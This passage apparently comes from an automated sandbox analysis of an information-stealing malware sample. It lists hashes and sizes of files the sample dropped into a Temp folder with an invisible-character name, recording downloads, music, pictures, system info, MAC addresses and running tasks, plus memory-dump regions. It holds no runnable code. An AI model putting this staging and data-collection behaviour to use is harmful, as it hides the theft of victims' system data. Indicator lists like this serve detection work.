                                          88ff2289788bd12cc1e49cfaecc1dfd243869ef39a6aa3913a9d430a0389c9ad0791c15770579a1d571fd7cf34d9d6b6aa3065fd893c40fe4e6470f76c274a4f

                                        • C:\Users\Admin\AppData\Local\Temp\    ‏​  ‍ \Directories\Downloads.txt

                                          Filesize

                                          826B

                                          MD5

                                          e59dd078d4ca7898b08c22d8357bef32

                                          SHA1

                                          eaae44b9ca19f87a1984367ad348cf296c51c6e2

                                          SHA256

                                          901a2f3933262896232df75c2ca462faf27cb7cc09d5df282353def0cb3d5baa

                                          SHA512

                                          9ecd099d1ef513e96fd998c2f0e25c3f5c3904b9a0bb883f11ab996836526602153e5572eb0c8367e50a680e8194103964fa2ba2e3378f089e77b8a588f55168

                                        • C:\Users\Admin\AppData\Local\Temp\    ‏​  ‍ \Directories\Music.txt

                                          Filesize

                                          531B

                                          MD5

                                          82550b9f1a5b79ee2cf5e616af8e4303

                                          SHA1

                                          2f21a3fd85210192025d276aa922011b66baa8cf

                                          SHA256

                                          9ca4e7b5e5fe1c921730a3176540b9f0411e7ffffc8c093166edb3999d853afc

                                          SHA512

                                          ea0e78a52f88b06f150cbdce4cfa02c1f1aedf2bb78966da38027e197625cca58023e45bfe2cb7c7a08dd4988afcf96a3b38e2a904ea544cdbf137801cf0425c

                                        • C:\Users\Admin\AppData\Local\Temp\    ‏​  ‍ \Directories\Pictures.txt

                                          Filesize

                                          564B

                                          MD5

                                          d68aadb4ce6ffc7f950473ebb4fc4970

                                          SHA1

                                          49ee7fb8659b2b439a60fda8aa0db0050bfe8fec

                                          SHA256

                                          52c0e4716c826f2342689d9ba100389d59e68eefe56df6b6e05cf4fb6b2fe9cc

                                          SHA512

                                          114e69cb178ff18d8a5d2f99a04b8d51a08bbe75451e4109e170bbf53a62a04bfb62f97ca94811aed82b7bdf7d8fac150d77c4246678123c64094521a4513e5d

                                        • C:\Users\Admin\AppData\Local\Temp\    ‏​  ‍ \Directories\Videos.txt

                                          Filesize

                                          30B

                                          MD5

                                          e140e10b2b43ba6f978bee0aa90afaf7

                                          SHA1

                                          bbbeb7097ffa9c2daa3206b3f212d3614749c620

                                          SHA256

                                          c3a706e5567ca4eb3e18543296fa17e511c7bb6bef51e63bf9344a59bf67e618

                                          SHA512

                                          df5b92757bf9200d0945afda94204b358b9f78c84fbaeb15bdf80eae953a7228f1c19fdf53ed54669562b8f0137623ea6cee38f38ef23a6f06de1673ff05733f

                                        • C:\Users\Admin\AppData\Local\Temp\    ‏​  ‍ \System\MAC Addresses.txt

                                          Filesize

                                          232B

                                          MD5

                                          e341b0d9d1ad46570358af4db022cc19

                                          SHA1

                                          9e9b3ef19c427c40ec0d68b7e174a91a45913a39

                                          SHA256

                                          4a356e83fd377d78e24832399ac45ebd2fd6913bf76f05606d7cb4a8616270f7

                                          SHA512

                                          31834695f4d78498abcd34dc4a69021a75452ab4f3ab94debff35feed3bd39a9a6b6f92d90f7ecea4f05a4162eef853f77e5558d2c770330009e34409a5f80ad

                                        • C:\Users\Admin\AppData\Local\Temp\    ‏​  ‍ \System\System Info.txt

                                          Filesize

                                          2KB

                                          MD5

                                          474a6698ed029657e0a74a14734758b1

                                          SHA1

                                          57724d06c0149e427e858a8f4aa9bb48dd385e02

                                          SHA256

                                          33fc4d630acf3ec4ea9a9dd9204f82f3e0dbc4264948e7f0fe40530328a0500b

                                          SHA512

                                          36fbefff8788c474a8842aff3a779efdd85f6e26d6e4547966a61a07ed9db76075429d1284ec557a6ed2c8a3c75d64d003e5ea3d882b6f16f3205111a0b97aad

                                        • C:\Users\Admin\AppData\Local\Temp\    ‏​  ‍ \System\Task List.txt

                                          Filesize

                                          12KB

                                          MD5

                                          5fd1fc5d11d80e487d6bfb8ddaa35c6f

                                          SHA1

                                          da3da8d8047b98128934f9b6d8dbd08321022244

                                          SHA256

                                          09a7dfb9538416f24e36245f76c2ebecb2417f5c2d845345ede0e3799fc1437f

                                          SHA512

                                          ba92314c952e3fa1a0fb4a54d517abdaf5c09042ca8a437ae7a3dfc3496b2896cc605e7066f58fd735848a7229ff50e7eff0a69a8c93f4fff48ea519156d7b44

                                        • memory/4212-60-0x00007FFD1AD40000-0x00007FFD1AEBF000-memory.dmp

                                          Filesize

                                          1.5MB

                                        • memory/4212-58-0x00007FFD2A530000-0x00007FFD2A554000-memory.dmp

                                          Filesize

                                          144KB

                                        • memory/4212-54-0x00007FFD2ACA0000-0x00007FFD2ACCD000-memory.dmp

                                          Filesize

                                          180KB

                                        • memory/4212-25-0x00007FFD1AEC0000-0x00007FFD1B585000-memory.dmp

                                          Filesize

                                          6.8MB

                                        • memory/4212-208-0x00007FFD1AEC0000-0x00007FFD1B585000-memory.dmp

                                          Filesize

                                          6.8MB

                                        • memory/4212-64-0x00007FFD2DD40000-0x00007FFD2DD4D000-memory.dmp

                                          Filesize

                                          52KB

                                        • memory/4212-102-0x00007FFD1AD40000-0x00007FFD1AEBF000-memory.dmp

                                          Filesize

                                          1.5MB

                                        • memory/4212-68-0x00007FFD1AEC0000-0x00007FFD1B585000-memory.dmp

                                          Filesize

                                          6.8MB

                                        • memory/4212-74-0x00007FFD2A1C0000-0x00007FFD2A1D4000-memory.dmp

                                          Filesize

                                          80KB

                                        • memory/4212-219-0x00007FFD2A210000-0x00007FFD2A2DE000-memory.dmp

                                          Filesize

                                          824KB

                                        • memory/4212-76-0x00007FFD2DBE0000-0x00007FFD2DBED000-memory.dmp

                                          Filesize

                                          52KB

                                        • memory/4212-170-0x00007FFD2A2E0000-0x00007FFD2A313000-memory.dmp

                                          Filesize

                                          204KB

                                        • memory/4212-171-0x00007FFD2A210000-0x00007FFD2A2DE000-memory.dmp

                                          Filesize

                                          824KB

                                        • memory/4212-78-0x00007FFD1A6E0000-0x00007FFD1A7FA000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/4212-73-0x00007FFD2DD50000-0x00007FFD2DD75000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/4212-69-0x00007FFD2A2E0000-0x00007FFD2A313000-memory.dmp

                                          Filesize

                                          204KB

                                        • memory/4212-71-0x00007FFD1A800000-0x00007FFD1AD33000-memory.dmp

                                          Filesize

                                          5.2MB

                                        • memory/4212-70-0x00007FFD2A210000-0x00007FFD2A2DE000-memory.dmp

                                          Filesize

                                          824KB

                                        • memory/4212-63-0x00007FFD2A510000-0x00007FFD2A529000-memory.dmp

                                          Filesize

                                          100KB

                                        • memory/4212-56-0x00007FFD2A870000-0x00007FFD2A88A000-memory.dmp

                                          Filesize

                                          104KB

                                        • memory/4212-220-0x00007FFD2A1C0000-0x00007FFD2A1D4000-memory.dmp

                                          Filesize

                                          80KB

                                        • memory/4212-221-0x00007FFD2DBE0000-0x00007FFD2DBED000-memory.dmp

                                          Filesize

                                          52KB

                                        • memory/4212-81-0x00007FFD2A530000-0x00007FFD2A554000-memory.dmp

                                          Filesize

                                          144KB

                                        • memory/4212-185-0x00007FFD1A800000-0x00007FFD1AD33000-memory.dmp

                                          Filesize

                                          5.2MB

                                        • memory/4212-47-0x00007FFD2DD50000-0x00007FFD2DD75000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/4212-48-0x00007FFD33890000-0x00007FFD3389F000-memory.dmp

                                          Filesize

                                          60KB

                                        • memory/4212-224-0x00007FFD2DD50000-0x00007FFD2DD75000-memory.dmp

                                          Filesize

                                          148KB

                                        • memory/4212-232-0x00007FFD2A2E0000-0x00007FFD2A313000-memory.dmp

                                          Filesize

                                          204KB

                                        • memory/4212-231-0x00007FFD2DD40000-0x00007FFD2DD4D000-memory.dmp

                                          Filesize

                                          52KB

                                        • memory/4212-230-0x00007FFD2A510000-0x00007FFD2A529000-memory.dmp

                                          Filesize

                                          100KB

                                        • memory/4212-229-0x00007FFD1AD40000-0x00007FFD1AEBF000-memory.dmp

                                          Filesize

                                          1.5MB

                                        • memory/4212-228-0x00007FFD2A530000-0x00007FFD2A554000-memory.dmp

                                          Filesize

                                          144KB

                                        • memory/4212-227-0x00007FFD2A870000-0x00007FFD2A88A000-memory.dmp

                                          Filesize

                                          104KB

                                        • memory/4212-226-0x00007FFD2ACA0000-0x00007FFD2ACCD000-memory.dmp

                                          Filesize

                                          180KB

                                        • memory/4212-225-0x00007FFD1A800000-0x00007FFD1AD33000-memory.dmp

                                          Filesize

                                          5.2MB

                                        • memory/4212-223-0x00007FFD33890000-0x00007FFD3389F000-memory.dmp

                                          Filesize

                                          60KB

                                        • memory/4212-222-0x00007FFD1A6E0000-0x00007FFD1A7FA000-memory.dmp

                                          Filesize

                                          1.1MB

                                        • memory/4368-79-0x00007FFD19653000-0x00007FFD19655000-memory.dmp

                                          Filesize

                                          8KB

                                        • memory/4368-80-0x00007FFD19650000-0x00007FFD1A111000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4368-119-0x00007FFD19650000-0x00007FFD1A111000-memory.dmp

                                          Filesize

                                          10.8MB

                                        • memory/4368-88-0x0000016D53CA0000-0x0000016D53CC2000-memory.dmp

                                          Filesize

                                          136KB

                                        • memory/4368-82-0x00007FFD19650000-0x00007FFD1A111000-memory.dmp

                                          Filesize

                                          10.8MB